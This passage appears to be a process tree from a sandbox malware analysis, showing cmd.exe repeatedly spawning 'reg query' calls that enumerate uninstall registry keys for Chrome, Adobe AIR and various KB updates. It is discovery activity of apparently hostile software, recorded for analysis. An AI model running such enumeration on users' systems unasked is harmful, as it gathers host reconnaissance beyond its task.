C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:2248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:2320
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2244
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:2264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2688
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:2520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:2436
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:2752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:2432
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2492
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:2332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:2624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:2612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2412
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2392
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2252
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:2296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:2312
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2440
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2284
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:2724
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2212
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1440
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:3060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:2668
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1128
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:2768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:2568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2896
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2928
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2868
-
-